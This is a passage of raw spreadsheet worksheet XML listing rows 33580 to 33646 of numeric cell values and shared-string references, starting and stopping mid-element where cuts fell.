        <v>2909.0</v>
      </c>
      <c r="B33580" s="2">
        <v>3.5818003E7</v>
      </c>
      <c r="C33580" s="2" t="s">
        <v>32323</v>
      </c>
      <c r="D33580" s="2">
        <v>1.0</v>
      </c>
      <c r="E33580" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33580" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33581" ht="15.75" customHeight="1">
      <c r="A33581" s="1">
        <v>2913.0</v>
      </c>
      <c r="B33581" s="2">
        <v>3.5830644E7</v>
      </c>
      <c r="C33581" s="2" t="s">
        <v>32324</v>
      </c>
      <c r="D33581" s="2">
        <v>1.0</v>
      </c>
      <c r="E33581" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33581" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33582" ht="15.75" customHeight="1">
      <c r="A33582" s="1">
        <v>2928.0</v>
      </c>
      <c r="B33582" s="2">
        <v>3.5885458E7</v>
      </c>
      <c r="C33582" s="2" t="s">
        <v>32325</v>
      </c>
      <c r="D33582" s="2">
        <v>1.0</v>
      </c>
      <c r="E33582" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33582" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33583" ht="15.75" customHeight="1">
      <c r="A33583" s="1">
        <v>2944.0</v>
      </c>
      <c r="B33583" s="2">
        <v>3.5984456E7</v>
      </c>
      <c r="C33583" s="2" t="s">
        <v>32326</v>
      </c>
      <c r="D33583" s="2">
        <v>1.0</v>
      </c>
      <c r="E33583" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33583" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33584" ht="15.75" customHeight="1">
      <c r="A33584" s="1">
        <v>2964.0</v>
      </c>
      <c r="B33584" s="2">
        <v>3.6073279E7</v>
      </c>
      <c r="C33584" s="2" t="s">
        <v>32327</v>
      </c>
      <c r="D33584" s="2">
        <v>1.0</v>
      </c>
      <c r="E33584" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33584" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33585" ht="15.75" customHeight="1">
      <c r="A33585" s="1">
        <v>2988.0</v>
      </c>
      <c r="B33585" s="2">
        <v>3.622417E7</v>
      </c>
      <c r="C33585" s="2" t="s">
        <v>32328</v>
      </c>
      <c r="D33585" s="2">
        <v>1.0</v>
      </c>
      <c r="E33585" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33585" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33586" ht="15.75" customHeight="1">
      <c r="A33586" s="1">
        <v>2993.0</v>
      </c>
      <c r="B33586" s="2">
        <v>3.6265016E7</v>
      </c>
      <c r="C33586" s="2" t="s">
        <v>32329</v>
      </c>
      <c r="D33586" s="2">
        <v>1.0</v>
      </c>
      <c r="E33586" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33586" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33587" ht="15.75" customHeight="1">
      <c r="A33587" s="1">
        <v>3006.0</v>
      </c>
      <c r="B33587" s="2">
        <v>3.6338448E7</v>
      </c>
      <c r="C33587" s="2" t="s">
        <v>32330</v>
      </c>
      <c r="D33587" s="2">
        <v>1.0</v>
      </c>
      <c r="E33587" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33587" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33588" ht="15.75" customHeight="1">
      <c r="A33588" s="1">
        <v>3011.0</v>
      </c>
      <c r="B33588" s="2">
        <v>3.6360311E7</v>
      </c>
      <c r="C33588" s="2" t="s">
        <v>32331</v>
      </c>
      <c r="D33588" s="2">
        <v>1.0</v>
      </c>
      <c r="E33588" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33588" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33589" ht="15.75" customHeight="1">
      <c r="A33589" s="1">
        <v>3032.0</v>
      </c>
      <c r="B33589" s="2">
        <v>3.6452514E7</v>
      </c>
      <c r="C33589" s="2" t="s">
        <v>32230</v>
      </c>
      <c r="D33589" s="2">
        <v>1.0</v>
      </c>
      <c r="E33589" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33589" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33590" ht="15.75" customHeight="1">
      <c r="A33590" s="1">
        <v>3167.0</v>
      </c>
      <c r="B33590" s="2">
        <v>3.7031013E7</v>
      </c>
      <c r="C33590" s="2" t="s">
        <v>32332</v>
      </c>
      <c r="D33590" s="2">
        <v>1.0</v>
      </c>
      <c r="E33590" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33590" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33591" ht="15.75" customHeight="1">
      <c r="A33591" s="1">
        <v>3219.0</v>
      </c>
      <c r="B33591" s="2">
        <v>3.7308141E7</v>
      </c>
      <c r="C33591" s="2" t="s">
        <v>32333</v>
      </c>
      <c r="D33591" s="2">
        <v>1.0</v>
      </c>
      <c r="E33591" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33591" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33592" ht="15.75" customHeight="1">
      <c r="A33592" s="1">
        <v>3220.0</v>
      </c>
      <c r="B33592" s="2">
        <v>3.7312501E7</v>
      </c>
      <c r="C33592" s="2" t="s">
        <v>32334</v>
      </c>
      <c r="D33592" s="2">
        <v>1.0</v>
      </c>
      <c r="E33592" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33592" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33593" ht="15.75" customHeight="1">
      <c r="A33593" s="1">
        <v>3255.0</v>
      </c>
      <c r="B33593" s="2">
        <v>3.7409595E7</v>
      </c>
      <c r="C33593" s="2" t="s">
        <v>32335</v>
      </c>
      <c r="D33593" s="2">
        <v>1.0</v>
      </c>
      <c r="E33593" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33593" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33594" ht="15.75" customHeight="1">
      <c r="A33594" s="1">
        <v>3298.0</v>
      </c>
      <c r="B33594" s="2">
        <v>3.7536237E7</v>
      </c>
      <c r="C33594" s="2" t="s">
        <v>32336</v>
      </c>
      <c r="D33594" s="2">
        <v>1.0</v>
      </c>
      <c r="E33594" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33594" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33595" ht="15.75" customHeight="1">
      <c r="A33595" s="1">
        <v>3431.0</v>
      </c>
      <c r="B33595" s="2">
        <v>3.8203038E7</v>
      </c>
      <c r="C33595" s="2" t="s">
        <v>32337</v>
      </c>
      <c r="D33595" s="2">
        <v>1.0</v>
      </c>
      <c r="E33595" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33595" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33596" ht="15.75" customHeight="1">
      <c r="A33596" s="1">
        <v>3495.0</v>
      </c>
      <c r="B33596" s="2">
        <v>3.8467156E7</v>
      </c>
      <c r="C33596" s="2" t="s">
        <v>32338</v>
      </c>
      <c r="D33596" s="2">
        <v>1.0</v>
      </c>
      <c r="E33596" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33596" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33597" ht="15.75" customHeight="1">
      <c r="A33597" s="1">
        <v>3531.0</v>
      </c>
      <c r="B33597" s="2">
        <v>3.8643425E7</v>
      </c>
      <c r="C33597" s="2" t="s">
        <v>32339</v>
      </c>
      <c r="D33597" s="2">
        <v>1.0</v>
      </c>
      <c r="E33597" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33597" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33598" ht="15.75" customHeight="1">
      <c r="A33598" s="1">
        <v>3532.0</v>
      </c>
      <c r="B33598" s="2">
        <v>3.867027E7</v>
      </c>
      <c r="C33598" s="2" t="s">
        <v>32340</v>
      </c>
      <c r="D33598" s="2">
        <v>1.0</v>
      </c>
      <c r="E33598" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33598" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33599" ht="15.75" customHeight="1">
      <c r="A33599" s="1">
        <v>3583.0</v>
      </c>
      <c r="B33599" s="2">
        <v>3.9024085E7</v>
      </c>
      <c r="C33599" s="2" t="s">
        <v>32341</v>
      </c>
      <c r="D33599" s="2">
        <v>1.0</v>
      </c>
      <c r="E33599" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33599" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33600" ht="15.75" customHeight="1">
      <c r="A33600" s="1">
        <v>3584.0</v>
      </c>
      <c r="B33600" s="2">
        <v>3.9024085E7</v>
      </c>
      <c r="C33600" s="2" t="s">
        <v>32342</v>
      </c>
      <c r="D33600" s="2">
        <v>1.0</v>
      </c>
      <c r="E33600" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33600" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33601" ht="15.75" customHeight="1">
      <c r="A33601" s="1">
        <v>3639.0</v>
      </c>
      <c r="B33601" s="2">
        <v>3.9281967E7</v>
      </c>
      <c r="C33601" s="2" t="s">
        <v>32343</v>
      </c>
      <c r="D33601" s="2">
        <v>1.0</v>
      </c>
      <c r="E33601" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33601" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33602" ht="15.75" customHeight="1">
      <c r="A33602" s="1">
        <v>3653.0</v>
      </c>
      <c r="B33602" s="2">
        <v>3.9309581E7</v>
      </c>
      <c r="C33602" s="2" t="s">
        <v>32344</v>
      </c>
      <c r="D33602" s="2">
        <v>1.0</v>
      </c>
      <c r="E33602" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33602" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33603" ht="15.75" customHeight="1">
      <c r="A33603" s="1">
        <v>3749.0</v>
      </c>
      <c r="B33603" s="2">
        <v>3.9710973E7</v>
      </c>
      <c r="C33603" s="2" t="s">
        <v>32345</v>
      </c>
      <c r="D33603" s="2">
        <v>1.0</v>
      </c>
      <c r="E33603" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33603" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33604" ht="15.75" customHeight="1">
      <c r="A33604" s="1">
        <v>3781.0</v>
      </c>
      <c r="B33604" s="2">
        <v>3.9911625E7</v>
      </c>
      <c r="C33604" s="2" t="s">
        <v>32346</v>
      </c>
      <c r="D33604" s="2">
        <v>1.0</v>
      </c>
      <c r="E33604" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33604" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33605" ht="15.75" customHeight="1">
      <c r="A33605" s="1">
        <v>3812.0</v>
      </c>
      <c r="B33605" s="2">
        <v>4.0069654E7</v>
      </c>
      <c r="C33605" s="2" t="s">
        <v>32347</v>
      </c>
      <c r="D33605" s="2">
        <v>1.0</v>
      </c>
      <c r="E33605" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33605" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33606" ht="15.75" customHeight="1">
      <c r="A33606" s="1">
        <v>3827.0</v>
      </c>
      <c r="B33606" s="2">
        <v>4.0145647E7</v>
      </c>
      <c r="C33606" s="2" t="s">
        <v>32348</v>
      </c>
      <c r="D33606" s="2">
        <v>1.0</v>
      </c>
      <c r="E33606" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33606" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33607" ht="15.75" customHeight="1">
      <c r="A33607" s="1">
        <v>3832.0</v>
      </c>
      <c r="B33607" s="2">
        <v>4.017983E7</v>
      </c>
      <c r="C33607" s="2" t="s">
        <v>32349</v>
      </c>
      <c r="D33607" s="2">
        <v>1.0</v>
      </c>
      <c r="E33607" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33607" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33608" ht="15.75" customHeight="1">
      <c r="A33608" s="1">
        <v>3844.0</v>
      </c>
      <c r="B33608" s="2">
        <v>4.0226112E7</v>
      </c>
      <c r="C33608" s="2" t="s">
        <v>32350</v>
      </c>
      <c r="D33608" s="2">
        <v>1.0</v>
      </c>
      <c r="E33608" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33608" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33609" ht="15.75" customHeight="1">
      <c r="A33609" s="1">
        <v>3899.0</v>
      </c>
      <c r="B33609" s="2">
        <v>4.0471097E7</v>
      </c>
      <c r="C33609" s="2" t="s">
        <v>32351</v>
      </c>
      <c r="D33609" s="2">
        <v>1.0</v>
      </c>
      <c r="E33609" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33609" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33610" ht="15.75" customHeight="1">
      <c r="A33610" s="1">
        <v>3902.0</v>
      </c>
      <c r="B33610" s="2">
        <v>4.0474451E7</v>
      </c>
      <c r="C33610" s="2" t="s">
        <v>32352</v>
      </c>
      <c r="D33610" s="2">
        <v>1.0</v>
      </c>
      <c r="E33610" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33610" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33611" ht="15.75" customHeight="1">
      <c r="A33611" s="1">
        <v>3923.0</v>
      </c>
      <c r="B33611" s="2">
        <v>4.0562334E7</v>
      </c>
      <c r="C33611" s="2" t="s">
        <v>32353</v>
      </c>
      <c r="D33611" s="2">
        <v>1.0</v>
      </c>
      <c r="E33611" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33611" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33612" ht="15.75" customHeight="1">
      <c r="A33612" s="1">
        <v>3946.0</v>
      </c>
      <c r="B33612" s="2">
        <v>4.0626986E7</v>
      </c>
      <c r="C33612" s="2" t="s">
        <v>32354</v>
      </c>
      <c r="D33612" s="2">
        <v>1.0</v>
      </c>
      <c r="E33612" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33612" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33613" ht="15.75" customHeight="1">
      <c r="A33613" s="1">
        <v>3973.0</v>
      </c>
      <c r="B33613" s="2">
        <v>4.0789215E7</v>
      </c>
      <c r="C33613" s="2" t="s">
        <v>32355</v>
      </c>
      <c r="D33613" s="2">
        <v>1.0</v>
      </c>
      <c r="E33613" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33613" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33614" ht="15.75" customHeight="1">
      <c r="A33614" s="1">
        <v>3975.0</v>
      </c>
      <c r="B33614" s="2">
        <v>4.0811222E7</v>
      </c>
      <c r="C33614" s="2" t="s">
        <v>32356</v>
      </c>
      <c r="D33614" s="2">
        <v>1.0</v>
      </c>
      <c r="E33614" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33614" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33615" ht="15.75" customHeight="1">
      <c r="A33615" s="1">
        <v>3993.0</v>
      </c>
      <c r="B33615" s="2">
        <v>4.0864254E7</v>
      </c>
      <c r="C33615" s="2" t="s">
        <v>32357</v>
      </c>
      <c r="D33615" s="2">
        <v>1.0</v>
      </c>
      <c r="E33615" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33615" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33616" ht="15.75" customHeight="1">
      <c r="A33616" s="1">
        <v>4013.0</v>
      </c>
      <c r="B33616" s="2">
        <v>4.091784E7</v>
      </c>
      <c r="C33616" s="2" t="s">
        <v>32358</v>
      </c>
      <c r="D33616" s="2">
        <v>1.0</v>
      </c>
      <c r="E33616" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33616" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33617" ht="15.75" customHeight="1">
      <c r="A33617" s="1">
        <v>4024.0</v>
      </c>
      <c r="B33617" s="2">
        <v>4.097195E7</v>
      </c>
      <c r="C33617" s="2" t="s">
        <v>32359</v>
      </c>
      <c r="D33617" s="2">
        <v>1.0</v>
      </c>
      <c r="E33617" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33617" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33618" ht="15.75" customHeight="1">
      <c r="A33618" s="1">
        <v>4066.0</v>
      </c>
      <c r="B33618" s="2">
        <v>4.1161926E7</v>
      </c>
      <c r="C33618" s="2" t="s">
        <v>32360</v>
      </c>
      <c r="D33618" s="2">
        <v>1.0</v>
      </c>
      <c r="E33618" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33618" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33619" ht="15.75" customHeight="1">
      <c r="A33619" s="1">
        <v>4094.0</v>
      </c>
      <c r="B33619" s="2">
        <v>4.1260901E7</v>
      </c>
      <c r="C33619" s="2" t="s">
        <v>32361</v>
      </c>
      <c r="D33619" s="2">
        <v>1.0</v>
      </c>
      <c r="E33619" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33619" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33620" ht="15.75" customHeight="1">
      <c r="A33620" s="1">
        <v>4104.0</v>
      </c>
      <c r="B33620" s="2">
        <v>4.1333727E7</v>
      </c>
      <c r="C33620" s="2" t="s">
        <v>32362</v>
      </c>
      <c r="D33620" s="2">
        <v>1.0</v>
      </c>
      <c r="E33620" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33620" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33621" ht="15.75" customHeight="1">
      <c r="A33621" s="1">
        <v>4170.0</v>
      </c>
      <c r="B33621" s="2">
        <v>4.1552502E7</v>
      </c>
      <c r="C33621" s="2" t="s">
        <v>32363</v>
      </c>
      <c r="D33621" s="2">
        <v>1.0</v>
      </c>
      <c r="E33621" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33621" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33622" ht="15.75" customHeight="1">
      <c r="A33622" s="1">
        <v>4231.0</v>
      </c>
      <c r="B33622" s="2">
        <v>4.1756742E7</v>
      </c>
      <c r="C33622" s="2" t="s">
        <v>32364</v>
      </c>
      <c r="D33622" s="2">
        <v>1.0</v>
      </c>
      <c r="E33622" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33622" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33623" ht="15.75" customHeight="1">
      <c r="A33623" s="1">
        <v>4262.0</v>
      </c>
      <c r="B33623" s="2">
        <v>4.1847506E7</v>
      </c>
      <c r="C33623" s="2" t="s">
        <v>32365</v>
      </c>
      <c r="D33623" s="2">
        <v>1.0</v>
      </c>
      <c r="E33623" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33623" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33624" ht="15.75" customHeight="1">
      <c r="A33624" s="1">
        <v>4274.0</v>
      </c>
      <c r="B33624" s="2">
        <v>4.187471E7</v>
      </c>
      <c r="C33624" s="2" t="s">
        <v>32366</v>
      </c>
      <c r="D33624" s="2">
        <v>1.0</v>
      </c>
      <c r="E33624" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33624" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33625" ht="15.75" customHeight="1">
      <c r="A33625" s="1">
        <v>4317.0</v>
      </c>
      <c r="B33625" s="2">
        <v>4.2002788E7</v>
      </c>
      <c r="C33625" s="2" t="s">
        <v>32367</v>
      </c>
      <c r="D33625" s="2">
        <v>1.0</v>
      </c>
      <c r="E33625" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33625" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33626" ht="15.75" customHeight="1">
      <c r="A33626" s="1">
        <v>4327.0</v>
      </c>
      <c r="B33626" s="2">
        <v>4.2048158E7</v>
      </c>
      <c r="C33626" s="2" t="s">
        <v>32368</v>
      </c>
      <c r="D33626" s="2">
        <v>1.0</v>
      </c>
      <c r="E33626" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33626" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33627" ht="15.75" customHeight="1">
      <c r="A33627" s="1">
        <v>4418.0</v>
      </c>
      <c r="B33627" s="2">
        <v>4.2294158E7</v>
      </c>
      <c r="C33627" s="2" t="s">
        <v>32369</v>
      </c>
      <c r="D33627" s="2">
        <v>1.0</v>
      </c>
      <c r="E33627" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33627" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33628" ht="15.75" customHeight="1">
      <c r="A33628" s="1">
        <v>4427.0</v>
      </c>
      <c r="B33628" s="2">
        <v>4.2320148E7</v>
      </c>
      <c r="C33628" s="2" t="s">
        <v>32370</v>
      </c>
      <c r="D33628" s="2">
        <v>1.0</v>
      </c>
      <c r="E33628" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33628" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33629" ht="15.75" customHeight="1">
      <c r="A33629" s="1">
        <v>4446.0</v>
      </c>
      <c r="B33629" s="2">
        <v>4.2399409E7</v>
      </c>
      <c r="C33629" s="2" t="s">
        <v>32371</v>
      </c>
      <c r="D33629" s="2">
        <v>1.0</v>
      </c>
      <c r="E33629" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33629" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33630" ht="15.75" customHeight="1">
      <c r="A33630" s="1">
        <v>4470.0</v>
      </c>
      <c r="B33630" s="2">
        <v>4.2468612E7</v>
      </c>
      <c r="C33630" s="2" t="s">
        <v>32372</v>
      </c>
      <c r="D33630" s="2">
        <v>1.0</v>
      </c>
      <c r="E33630" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33630" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33631" ht="15.75" customHeight="1">
      <c r="A33631" s="1">
        <v>4517.0</v>
      </c>
      <c r="B33631" s="2">
        <v>4.2607757E7</v>
      </c>
      <c r="C33631" s="2" t="s">
        <v>32373</v>
      </c>
      <c r="D33631" s="2">
        <v>1.0</v>
      </c>
      <c r="E33631" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33631" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33632" ht="15.75" customHeight="1">
      <c r="A33632" s="1">
        <v>4579.0</v>
      </c>
      <c r="B33632" s="2">
        <v>4.276667E7</v>
      </c>
      <c r="C33632" s="2" t="s">
        <v>32374</v>
      </c>
      <c r="D33632" s="2">
        <v>1.0</v>
      </c>
      <c r="E33632" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33632" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33633" ht="15.75" customHeight="1">
      <c r="A33633" s="1">
        <v>4585.0</v>
      </c>
      <c r="B33633" s="2">
        <v>4.278756E7</v>
      </c>
      <c r="C33633" s="2" t="s">
        <v>32375</v>
      </c>
      <c r="D33633" s="2">
        <v>1.0</v>
      </c>
      <c r="E33633" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33633" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33634" ht="15.75" customHeight="1">
      <c r="A33634" s="1">
        <v>4629.0</v>
      </c>
      <c r="B33634" s="2">
        <v>4.2986315E7</v>
      </c>
      <c r="C33634" s="2" t="s">
        <v>32376</v>
      </c>
      <c r="D33634" s="2">
        <v>1.0</v>
      </c>
      <c r="E33634" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33634" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33635" ht="15.75" customHeight="1">
      <c r="A33635" s="1">
        <v>4648.0</v>
      </c>
      <c r="B33635" s="2">
        <v>4.3079854E7</v>
      </c>
      <c r="C33635" s="2" t="s">
        <v>32377</v>
      </c>
      <c r="D33635" s="2">
        <v>1.0</v>
      </c>
      <c r="E33635" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33635" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33636" ht="15.75" customHeight="1">
      <c r="A33636" s="1">
        <v>4651.0</v>
      </c>
      <c r="B33636" s="2">
        <v>4.310156E7</v>
      </c>
      <c r="C33636" s="2" t="s">
        <v>32378</v>
      </c>
      <c r="D33636" s="2">
        <v>1.0</v>
      </c>
      <c r="E33636" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33636" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33637" ht="15.75" customHeight="1">
      <c r="A33637" s="1">
        <v>4666.0</v>
      </c>
      <c r="B33637" s="2">
        <v>4.3137205E7</v>
      </c>
      <c r="C33637" s="2" t="s">
        <v>32379</v>
      </c>
      <c r="D33637" s="2">
        <v>1.0</v>
      </c>
      <c r="E33637" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33637" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33638" ht="15.75" customHeight="1">
      <c r="A33638" s="1">
        <v>4725.0</v>
      </c>
      <c r="B33638" s="2">
        <v>4.3320068E7</v>
      </c>
      <c r="C33638" s="2" t="s">
        <v>32380</v>
      </c>
      <c r="D33638" s="2">
        <v>1.0</v>
      </c>
      <c r="E33638" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33638" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33639" ht="15.75" customHeight="1">
      <c r="A33639" s="1">
        <v>4747.0</v>
      </c>
      <c r="B33639" s="2">
        <v>4.3385448E7</v>
      </c>
      <c r="C33639" s="2" t="s">
        <v>32381</v>
      </c>
      <c r="D33639" s="2">
        <v>1.0</v>
      </c>
      <c r="E33639" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33639" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33640" ht="15.75" customHeight="1">
      <c r="A33640" s="1">
        <v>4758.0</v>
      </c>
      <c r="B33640" s="2">
        <v>4.3406262E7</v>
      </c>
      <c r="C33640" s="2" t="s">
        <v>32382</v>
      </c>
      <c r="D33640" s="2">
        <v>1.0</v>
      </c>
      <c r="E33640" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33640" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33641" ht="15.75" customHeight="1">
      <c r="A33641" s="1">
        <v>4775.0</v>
      </c>
      <c r="B33641" s="2">
        <v>4.3438979E7</v>
      </c>
      <c r="C33641" s="2" t="s">
        <v>32383</v>
      </c>
      <c r="D33641" s="2">
        <v>1.0</v>
      </c>
      <c r="E33641" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33641" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33642" ht="15.75" customHeight="1">
      <c r="A33642" s="1">
        <v>4787.0</v>
      </c>
      <c r="B33642" s="2">
        <v>4.3475522E7</v>
      </c>
      <c r="C33642" s="2" t="s">
        <v>32384</v>
      </c>
      <c r="D33642" s="2">
        <v>1.0</v>
      </c>
      <c r="E33642" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33642" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33643" ht="15.75" customHeight="1">
      <c r="A33643" s="1">
        <v>4821.0</v>
      </c>
      <c r="B33643" s="2">
        <v>4.3613903E7</v>
      </c>
      <c r="C33643" s="2" t="s">
        <v>32385</v>
      </c>
      <c r="D33643" s="2">
        <v>1.0</v>
      </c>
      <c r="E33643" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33643" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33644" ht="15.75" customHeight="1">
      <c r="A33644" s="1">
        <v>4826.0</v>
      </c>
      <c r="B33644" s="2">
        <v>4.3639761E7</v>
      </c>
      <c r="C33644" s="2" t="s">
        <v>32386</v>
      </c>
      <c r="D33644" s="2">
        <v>1.0</v>
      </c>
      <c r="E33644" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33644" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33645" ht="15.75" customHeight="1">
      <c r="A33645" s="1">
        <v>4844.0</v>
      </c>
      <c r="B33645" s="2">
        <v>4.3695073E7</v>
      </c>
      <c r="C33645" s="2" t="s">
        <v>32387</v>
      </c>
      <c r="D33645" s="2">
        <v>1.0</v>
      </c>
      <c r="E33645" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33645" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33646" ht="15.75" customHeight="1">
      <c r="A33646" s="1">
        <v>4860.0</v>
      </c>
      <c r="B33646" s="2">
        <v>4.3801199E7</v>
      </c>
      <c r="C33646" s="2" t="s">
        <v>32388</v>
      </c>
      <c r="D33646" s="2">
        <v>1.0</v>
      </c>
      <c r="E33646" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33646" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33647" ht="15.75" customHeight="1">
      <c r="A33647" s="1">
